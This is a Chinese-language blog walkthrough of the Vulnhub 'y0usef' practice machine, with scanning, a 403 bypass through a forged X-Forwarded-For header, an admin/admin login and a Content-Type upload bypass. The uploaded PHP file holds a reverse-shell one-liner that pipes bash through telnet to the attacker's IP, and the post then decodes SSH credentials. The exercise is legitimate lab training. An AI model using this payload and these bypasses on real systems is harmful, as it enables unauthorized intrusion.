Vulnhub--y0usef

最新推荐文章于 2024-04-28 13:16:41 发布
最新推荐文章于 2024-04-28 13:16:41 发布
阅读量191 收藏
点赞数
文章标签: linux 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45168704/article/details/131220287
版权

0x01靶机介绍

项目Value
项目地址https://www.vulnhub.com/entry/y0usef-1,624/
镜像链接https://download.vulnhub.com/y0usef/y0usef.ova
作者y0usef
发布日期2020年12月10日
系列y0usef
难度easy
目的获取root权限

0x02靶机搭建

工具:VirtualBox7.0
镜像:y0usef.ova

搭建方式:

VirtualBox7.0:
1.管理–>导入虚拟机–>y0usef.ova–> Finish
在这里插入图片描述
2.设置–>显示–>VMSVGA
网络–>桥接–>混杂模式全部允许(并记下mac号)

在这里插入图片描述

3.开启我们的攻击机kali(和靶机一样桥接同一个网卡)和靶机

桥接网段:192.168.3.0/24
kali的IP地址:192.168.3.59

0x03渗透流程

一、信息收集

1.主机发现
arp-scan -l

在这里插入图片描述

2.查看端口
nmap -sV -p- 192.168.3.87

在这里插入图片描述
80端口
在这里插入图片描述

3.指纹收集
whatweb http://192.168.3.87

在这里插入图片描述

3.目录扫描
dirsearch -u http://192.168.3.87 -e *

-e:指定要包含在搜索中的文件扩展名。* 表示将包括所有文件扩展名。
在这里插入图片描述

二、漏洞分析和利用

1.getshell

访问:http://192.168.3.87/adminstration/ 没有权限且状态码403,尝试403绕过

在这里插入图片描述
这里添加指向本地的X-Forwarded-For header头进行bypass
使用方式可以使用burp抓包修改,也可以使用firefox浏览器的插件X-Forwarded-For Header
在这里插入图片描述在这里插入图片描述
弱口令admin/admin进行登陆,发现文件上传点
在这里插入图片描述

直接上传一个一句话反弹shell、文件名shell.php,内容为

<?php system('mknod a p; telnet 192.168.3.59 7777 0<a | /bin/bash 1>a'); ?>

上传失败,我们使用Burp抓包修改一下content-type为image/jpg上传成功
在这里插入图片描述
kali开启监听端口

nc -lvvp 7777

访问地址

http://192.168.3.87/adminstration/upload/files/1686795235shell.php

成功监听:
在这里插入图片描述

2.提权

在/home家目录中的user.txt,经过了bas64编码,需要将其解码:

cd ../../../../../../../../../home

在这里插入图片描述

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

在这里插入图片描述
使用ssh连接即可提权成功

ssh yousef@192.168.3.87

在这里插入图片描述

巴鸽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fsf-ft-11-MERN-starter
03-05
npm init -y npm install express mongoose 生成Express应用 需要快递 创建一个Express实例 将服务器端口设置为3001 听PORT 添加中间件 app . use ( express . urlencoded ( { extended : true } ) ) ; app . ...
Vulnhub_y0usef
qq_45434762的博客
01-12 385
发现目标主机使用nmap扫描整个网段,发现目标主机nmap 192.168.1.0/24 通过简单的扫描发现目标主机开放了22和80端口使用nmap再对目标主机进行详细的探测,发现任然只...
vulnhub:Y0USEF
cjstang的博客
06-26 821
OSCP-4,主要利用方式:403请求绕过+文件上传绕过+RCE反弹shell 靶场: vulnhub.com 靶机名称: Y0USEF:1 难度: 中等
vulnhub-y0usef
m0_62008601的博客
09-18 384
简单的渗透练习
vulnhub--y0usef
weixin_45922278的博客
02-01 317
y0usef 一、信息收集 1.namp扫描: 发现开了http、ssh服务。 访问192.168.0.101:80。网页为空。 2.御剑后台扫描: ./adminstration 目录较为特殊 403 :服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。 二、尝试越权 1.X-Forwarded-For: 头部带上x-forwarded-for:127.0.0.1,伪装成本地访问。 2.burp暴力破解: 带上头
vulnhub靶机--y0usef(难度:easy)
weixin_46107179的博客
04-20 2101
靶机下载地址:下载链接 主机发现 通过arp-scan -l扫描得到靶机的IP地址为10.0.2.4 信息搜集 通过nmap扫描,可以得到靶机只开启了22,80端口(ssh,Apache服务) 打开浏览器访问,发现这个站点还在建设中,但是服务器在运行中 尝试了robots.txt,发现没有该文件,查看源代码也没有什么发现,于是,再用dirsearch扫描一下目录,发现基本上是403,可能权限不够,访问其他200的响应码发现与开始的主页面一样 但是还有一个adminstration的目录,进行访问,结
Ultranarrow bandwidth tunable atomic filter via quantum interference-induced polarization rotation in Rb vapor
02-05
We report the experimental demonstration of an ultranarrow bandwidth atomic filter by optically induced polarization rotation in multilevel electromagnetically ... The presented atomic filter has usef
realtek sdk编译总结.zip_laughq61_pairfem_realtek sdk_realtek 编译_usef
07-13
如何编译realtek sdk源码.包括交叉编译工具的设置,编译选项如何选择等
RGIT-annual-asset-depreciation-App:使用双倍余额递减和年数总和法评估公司资产的年度折旧的应用程序
03-21
RGIT的财务人员希望您开发一个应用程序,该应用程序将使用双倍余额递减和年数总和法评估公司资产的年度折旧。 The Financial officer will enter the asset’s ...It also provides a list box for selecting the usef
metadata.angular.js
07-18
元数据.angular.js 基于平台的元数据功能的模块。 版权和许可 This program is available under dual licensing. ...You can redistribute this ...This program is distributed in the hope that it will be usef
vulnhub靶机-Y0USEF: 1
臭nana的博客
12-17 1250
1、找到靶机ip:192.168.75.11 nmap -sn 192.168.75.0/24 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.11 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.75.11 Host is up (0.00038s latency). Not shown: 65533 closed ports PORT STATE
kali之vulnhub,y0usef
weixin_54431413的博客
05-21 557
主要学到了,一、针对403拒绝访问不要直接放弃渗透,而是尝试一些替换主机头host,URL覆盖,referer来源,一些反向代理头的修改,列如:x-forwarded-for。 二、文件上传mine类型的绕过
每周打靶VulnHub靶机-y0usef
m0_54178755的博客
10-05 110
每周打靶VulnHub靶机-y0usef
VnlnHub y0usef
weixin_45682839的博客
09-11 842
涉及知识包括:端口服务探测、铭感目录搜集、WEB信息收集、403frobidden bypass绕过、弱口令爆破、文件上传及绕过、本地提权等
VulnHuby0usef靶场(1)
p_utao的博客
02-08 389
场信息: 地址:https://www.vulnhub.com/entry/y0usef-1,624/ 发布日期:2020年12月10日 难度:简单 目标:user.txt和root.txt 运行:VirtualBox(网络桥接) 信息收集 Web 服务器: Apache 2.4.10 编程语言: PHP 5.5.9 操作系统: Ubuntu nmap扫描一下 nmap 192.168.1.0/24 Nmap scan report for 192.168.1.50 Host is u
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 1041
子网ip 与网关。
Linux多进程(五) 进程池 C++实现
Lyajpunov的博客
04-26 785
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux:浏览器访问网站的基本流程(优先级从先到后)
最新发布
fox_kang的博客
04-28 595
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 抽象命名空间(Abstract Namespace)简介
日拱一卒,玉汝于成
04-25 575
与传统的 UDS 不同,抽象命名空间并不在文件系统中创建实际文件,而是仅存在于内核内存中,其名称以 localabstract: 作为前缀。在这个例子中,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统中生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。
Capacity mismatch for disk D:\xuniji\baji\y0usef\\y0usef-disk1.vmdk。
04-28
"Capacity mismatch for disk D:\xuniji\baji\y0usef\y0usef-disk1.vmdk" 是一个错误提示,意味着磁盘容量不匹配。这通常发生在虚拟机或虚拟磁盘的配置中。 可能的原因是,虚拟磁盘文件的容量与虚拟机配置中指定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值